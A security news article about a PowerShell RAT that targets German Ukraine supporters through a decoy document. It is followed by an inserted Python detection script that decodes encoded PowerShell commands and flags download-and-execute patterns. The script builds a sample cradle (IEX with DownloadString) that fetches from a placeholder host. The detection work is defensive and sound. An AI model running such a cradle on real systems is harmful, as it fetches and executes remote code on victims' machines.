
Ukraine supporters in Germany targeted with PowerShell RAT malware
2022-05-16 18:05

An unknown threat actor is targeting German users interested in the Ukraine crisis, infecting them with a custom PowerShell RAT and stealing their data.

The sites used in the campaign offer malicious documents that install a custom RAT supporting remote command execution and file operations.

Visitors to the site will find a file called "2022-Q2-Bedrohungslage-Ukraine," promising information about the situation in Ukraine and offered for free download. The corresponding section on the site claims that the document is constantly updated with new information, so users are urged to get a fresh copy every day.

In the background, the file launches PowerShell, which runs a Base64 deobfuscation routine that fetches and executes a malicious script from the fake site.

The RAT is delivered in .txt file form alongside a .cmd file that helps execute it through PowerShell.

The custom PowerShell RAT, which hides in "Status.txt", begins its operation by collecting basic system information and assigning the host a unique client ID. That information, and anything else stolen from the host, is exfiltrated to a German domain, "Kleinm[.]de".
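The execution chain described above (a .cmd helper spawning PowerShell, which decodes a Base64 blob and fetches a script) leaves a recognizable trace in process-creation telemetry. The following is an added detection example, not code from the article or from the malware: it takes Sysmon-style process-creation events (constructed here, with a placeholder URL on the reserved example.invalid domain), decodes any -EncodedCommand payload the way powershell.exe would (Base64 over UTF-16LE), and scores each event on indicators such as a hidden window, a cmd.exe parent, and download-and-execute keywords in the decoded text. Field names and the scoring threshold are assumptions for illustration.

```python
import base64
import binascii
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style field names);
# these are NOT real telemetry from the campaign described in the article.
ENCODED_CRADLE = base64.b64encode(
    # powershell.exe -EncodedCommand expects Base64 over UTF-16LE text.
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/Status.txt')"
    .encode("utf-16le")
).decode("ascii")

SAMPLE_EVENTS = [
    # 1: the user runs the .cmd helper that accompanies the decoy document
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c "2022-Q2-Bedrohungslage-Ukraine.cmd"'},
    # 2: the .cmd spawns a hidden PowerShell carrying an encoded download-and-execute stub
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED_CRADLE}"},
    # 3: benign administrative use of PowerShell, for contrast
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\Backup.ps1"},
]

# Keyword patterns checked against the visible command line plus the decoded payload.
INDICATOR_PATTERNS = {
    "invoke_expression": r"\biex\b|invoke-expression",
    "download_cradle": r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|invoke-restmethod",
    "nested_base64": r"frombase64string",
}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if the command line has none.

    powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
    so the flag is matched by prefix rather than by a fixed spelling.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith("-") and len(tok) > 1 and "encodedcommand".startswith(tok[1:].lower()):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
            except (binascii.Error, ValueError):
                return None
            return raw.decode("utf-16le", errors="replace")
    return None


def analyze_event(event):
    """Score one process-creation event; returns {'score': int, 'indicators': [...]}."""
    indicators = []
    if not event["image"].lower().startswith("powershell"):
        return {"score": 0, "indicators": indicators}
    raw = event["cmdline"].lower()
    if re.search(r"-w(?:indowstyle)?\s+hidden", raw):
        indicators.append("hidden_window")
    if re.search(r"-nop(?:rofile)?\b", raw):
        indicators.append("no_profile")
    if event["parent"].lower() == "cmd.exe":
        indicators.append("spawned_by_cmd")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        indicators.append("encoded_command")
    # Inspect both the visible command line and the decoded payload, since the
    # download-and-execute logic may sit in either.
    text = raw + " " + (decoded.lower() if decoded else "")
    for name, pattern in INDICATOR_PATTERNS.items():
        if re.search(pattern, text):
            indicators.append(name)
    return {"score": len(indicators), "indicators": indicators}


def triage(events, threshold=3):
    """Return the events whose indicator count reaches the (assumed) threshold."""
    flagged = []
    for ev in events:
        result = analyze_event(ev)
        if result["score"] >= threshold:
            flagged.append({**ev, **result})
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["parent"], "->", hit["image"], hit["indicators"])
```

Decoding the payload rather than matching only on the visible command line is the point: a plain `-enc` flag is common in legitimate automation, but a hidden window, a cmd.exe parent and a decoded `IEX ... DownloadString` together match the chain this campaign relies on, while the benign `-File` invocation scores zero.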


News URL

https://www.bleepingcomputer.com/news/security/ukraine-supporters-in-germany-targeted-with-powershell-rat-malware/